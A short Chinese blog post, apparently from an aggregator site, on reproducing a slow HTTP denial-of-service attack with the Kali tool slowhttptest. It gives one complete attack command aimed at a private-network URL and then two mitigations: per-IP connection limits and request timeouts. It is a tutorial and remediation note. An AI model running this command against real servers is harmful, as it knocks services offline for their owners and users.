慢速HTTP拒接服务攻击(DoS)复现

Posted 可我浪费着我寒冷的年华

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了慢速HTTP拒接服务攻击(DoS)复现相关的知识,希望对你有一定的参考价值。

kali linux下有个神奇的工具叫“slowhttptest

  命令:slowhttptest -c 1000 -H -g -o slowhttp -i 10 -r 200 -t GET -u http://10.210.6.69:8081/nmc -x 24 -p                                          

  

  在进行慢速DOS攻击期间打开相应页面服务器会响应缓慢或直接无法响应:

  

 

 

修补的方案:

1、限制单机ip的连接数。

2、限制http request header/body 的超时时间

 

以上是关于慢速HTTP拒接服务攻击(DoS)复现的主要内容,如果未能解决你的问题,请参考以下文章

HTTP慢速攻击

慢速dos攻击

慢速dos攻击

http慢速攻击漏洞修复

Camel Jetty 中的 continuationTimeout 是不是可用于缓解慢速 HTTP Dos 攻击?

慢速连接攻击有几种攻击类型